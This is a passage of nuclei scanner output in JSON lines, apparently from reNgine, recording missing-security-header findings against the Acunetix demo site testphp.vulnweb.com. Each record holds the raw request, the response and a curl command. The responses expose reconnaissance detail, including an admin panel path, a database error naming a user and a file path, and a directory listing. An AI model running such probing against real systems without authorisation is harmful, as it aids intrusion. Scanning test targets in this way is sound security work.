OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chead\\u003e\\n \\u003ctitle\\u003eAdministrative panel\\u003c/title\\u003e \\n \\u003clink rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"style.css\\\"\\u003e \\n\\u003c/head\\u003e\\n \\n\\u003cbody\\u003e\\n\\u003cp\\u003e \\n \\u003ccenter\\u003e\\n \\u003cimg src=\\\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\n \\u003ch2\\u003eAdministrative Panel\\u003c/h2\\u003e\\n \\u003c/center\\u003e\\n\\u003c/p\\u003e \\n \\n\\u003cb\\u003eLast 100 visitors on this site\\u003c/b\\u003e\\n\\n\\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\\n\\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\\nWebsite is out of order. Please visit back later. Thank you for understanding.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:44.469203566Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/hpp\",\"path\":\"/hpp\",\"matched-at\":\"http://testphp.vulnweb.com/hpp/\",\"request\":\"GET /hpp HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003ctitle\\u003eHTTP Parameter Pollution Example\\u003c/title\\u003e\\r\\n\\r\\n\\u003ca href=\\\"?pp=12\\\"\\u003echeck\\u003c/a\\u003e\\u003cbr/\\u003e\\r\\n\\r\\n\\u003chr\\u003e\\r\\n\\u003ca href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'\\u003eOriginal article\\u003c/a\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:44.469253381Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"request\":\"GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:44.469275226Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"path\":\"/Mod_Rewrite_Shop\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"request\":\"GET /Mod_Rewrite_Shop HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n\\t\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/1.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003eNetwork Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003ePrice\\u003cbr\\u003e359 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/2.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003eWeb Camera A4Tech PK-335E\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003ePrice\\u003cbr\\u003e10 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/3.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/color-printer/3/'\\u003eLaser Color Printer HP LaserJet M551dn, A4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/color-printer/3/'\\u003ePrice\\u003cbr\\u003e812 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003c/div\\u003e\\r\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:44.46928015Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testphp.vulnweb.com/admin/\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /admin/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /admin/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"create.sql\\\"\\u003ecreate.sql\\u003c/a\\u003e 11-May-2011 10:27 523\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:45.130058947Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:45.130110747Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:45.130151298Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:45.130164121Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:45.737941349Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:45.737983419Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"path\":\"/cgi-bin/status\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"request\":\"GET /cgi-bin/status HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 